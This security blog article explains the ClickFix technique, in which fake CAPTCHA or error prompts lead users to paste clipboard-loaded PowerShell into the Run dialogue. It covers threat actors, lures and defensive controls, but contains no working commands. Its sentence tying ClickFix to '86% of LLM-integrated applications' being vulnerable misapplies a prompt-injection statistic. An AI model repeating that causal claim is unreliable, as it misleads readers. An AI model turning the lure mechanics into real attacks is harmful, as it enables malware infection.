What is ClickFix? The Social Engineering Attack Bypassing Your Defences

ClickFix attacks surged 517% in the first half of 2025, now accounting for 8% of all blocked attacks (ESET, 2025). From the number of news reports we have seen it confirms this social engineering technique has become the second most common attack vector after traditional phishing. Nation-state groups from North Korea, Iran, and Russia have all adopted ClickFix in espionage campaigns, proving its effectiveness against even security-aware targets.

Here is what makes ClickFix dangerous: it bypasses automated security controls by convincing users to infect themselves.

Get practical security insights delivered weekly. Subscribe to CyberDesserts for threat intelligence without the vendor spin.

How ClickFix Works

ClickFix tricks users into running malicious commands on their own computers. The attack unfolds in three steps:

Step 1: The fake prompt. You land on a webpage showing what looks like a CAPTCHA ("Verify you are human"), a browser error ("Update required"), or a document problem ("Install plugin to view PDF"). The page looks legitimate. It is not.

Step 2: The keyboard shortcut. The prompt tells you to press Windows+R. This opens the Windows Run dialogue, a built-in system tool. Because it is a legitimate Windows feature, security software does not block it.

Step 3: The payload. You are told to paste (Ctrl+V) and press Enter. What you do not realise is that malicious code was silently copied to your clipboard when you clicked the fake prompt. That single keystroke executes a PowerShell script that downloads malware.

The entire attack takes seconds. The victim bypasses their own security controls without realising it.

macOS users are not immune. The same technique directs them to paste commands into Terminal instead of the Run dialogue.

Why Security Tools Miss It

Traditional security solutions struggle with ClickFix because the malicious payload is not delivered through conventional channels.

Most endpoint detection tools look for malware being downloaded and executed automatically. ClickFix inverts this: the user manually initiates the execution. Email security scans attachments for malicious code, but ClickFix campaigns often contain only a URL or a clean HTML file that redirects to the attack page.

The commands themselves are typically obfuscated PowerShell one-liners that download the actual malware from attacker-controlled infrastructure. By the time the payload arrives, it is running in a user-initiated process that many tools treat as legitimate activity.

This explains why 86% of LLM-integrated applications tested by security researchers were vulnerable to similar user-initiated attack vectors (HouYi Research, 2024). For more on how attackers exploit user trust in AI interfaces, see our breakdown of prompt injection attacks.

Who Uses ClickFix

ClickFix emerged in early 2024 from cybercriminal groups, first observed by Proofpoint in campaigns by the initial access broker TA571 and the ClearFake malware cluster. Within months, it spread across the threat landscape.

Cybercriminal campaigns deliver infostealers like Lumma Stealer, DarkGate, AsyncRAT, and Danabot. The Storm-1865 campaign impersonated Booking.com to target hospitality organisations across North America, Europe, and Asia. Healthcare professionals were targeted through a compromised physical therapy video site (HEP2go) that redirected users to ClickFix prompts.

Nation-state adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

• Kimsuky (North Korea) targeted think tanks researching North Korean policy, posing as a Japanese diplomat to build trust before delivering ClickFix payloads that installed QuasarRAT
• MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday to add legitimacy
• APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
• UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

When nation-state actors adopt a criminal technique this quickly, it works.

Common ClickFix Lures

Attackers continuously refine their social engineering. Current campaigns use these pretexts:

• Fake CAPTCHAs displaying "Verify you are human" with instructions to run commands
• Browser update prompts claiming the page cannot display without an update
• Document viewer errors requiring a "plugin" to view PDF or Word files
• Video conferencing issues impersonating Google Meet or Zoom with "fix your audio/video" prompts
• Device registration claiming the user must register their device to access content
• Social Security Administration notices about account issues (observed June 2025)

The lures exploit urgency and familiarity. Users have been conditioned to trust "fix" buttons through years of legitimate Microsoft tools. From 2010-2015, Microsoft's "Fix it" solutions trained users to click automated repair prompts. Windows Troubleshooters continue this pattern today. Attackers exploit that learned behaviour: when users see a familiar "fix" button, they follow the instructions without questioning whether the source is legitimate.

The name "ClickFix" itself (coined by Proofpoint researchers in 2024) reflects this pattern. Malicious prompts almost always include a button labelled "Fix", "How to fix", or "Fix it" because attackers know users have been trained to click them.

Defence Strategies

Blocking ClickFix requires both technical controls and user awareness.

Technical controls:

• Restrict PowerShell execution for non-administrative users through Group Policy
• Block or monitor WScript.exe and mshta.exe via AppLocker or Windows Defender Application Control
• Deploy endpoint detection rules for AMSI bypass patterns commonly used by ClickFix payloads
• Monitor for unusual PowerShell user agents in network traffic

User awareness training:

• Legitimate CAPTCHA verification never requires running system commands
• No website needs access to your Run dialogue or Terminal
• Commands copied from websites should never be pasted into system tools
• When in doubt, report the prompt to your security team rather than attempting to fix it

Detection opportunities:

• Alert on Windows+R followed by PowerShell execution within short timeframes
• Monitor clipboard activity for encoded PowerShell commands
• Flag HTTP requests with PowerShell user agents to external infrastructure

For organisations running ELK or similar SIEM platforms, Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules specifically targeting ClickFix behaviour patterns.

Summary

ClickFix represents a shift in attacker tactics. Rather than fighting endpoint security head-on, attackers now recruit users to bypass their own defences. The technique's effectiveness is proven by its rapid adoption across both cybercriminal groups and nation-state actors within 18 months of first appearing.

The defence is straightforward but requires action: restrict unnecessary system tool access, train users to recognise these lures, and deploy detection rules for the specific execution patterns ClickFix relies on.

For a broader view of how social engineering techniques fit into the current threat landscape, see our AI Security Threats guide.

Last updated: January 2026

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering attack that tricks users into executing malicious commands on their own computers. Attackers use fake CAPTCHA prompts or error messages to convince victims to open the Windows Run dialogue and paste a malicious PowerShell command.

How does a ClickFix attack work?

The attack has three steps: a fake prompt appears claiming the user needs to verify their identity or fix an issue, the user is instructed to press Windows+R to open the Run dialogue, and finally told to paste a command (already copied to their clipboard) and press Enter. This executes malware without triggering typical security alerts.

What malware does ClickFix deliver?

ClickFix campaigns commonly deliver infostealers like Lumma Stealer, DarkGate, and SnakeStealer, as well as remote access trojans including AsyncRAT, QuasarRAT, and NetSupport RAT. The specific payload depends on the threat actor.

Can ClickFix target Mac users?

Yes. Campaigns targeting macOS users have been observed since May 2025, delivering Atomic macOS Stealer (AMOS). These attacks direct users to paste commands into Terminal instead of the Windows Run dialogue.

How do I protect against ClickFix?

Restrict PowerShell and script execution for standard users, deploy endpoint detection rules for ClickFix patterns, and train employees that legitimate verification prompts never require running system commands. If a website asks you to open Run or Terminal, close the page and report it.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) between late 2024 and early 2025, targeting government, defence, and think tank organisations.

References and Sources

1. ESET. (2025). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks.
2. Proofpoint. (2025). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by Kimsuky, MuddyWater, APT28, and UNK_RemoteRogue.
3. Microsoft Security. (2025). Think before you Click(Fix). Technical analysis of ClickFix campaigns including Lampion malware distribution.
4. Infosecurity Magazine. (2025). ClickFix Attacks Surge 517% in 2025. Summary of ESET H1 2025 findings.
5. Proofpoint. (2024). ClickFix Social Engineering Technique Floods Threat Landscape. Initial documentation of ClickFix emergence and early campaigns.

Threats evolve weekly. Subscribers get practical analysis when it matters, not marketing fluff.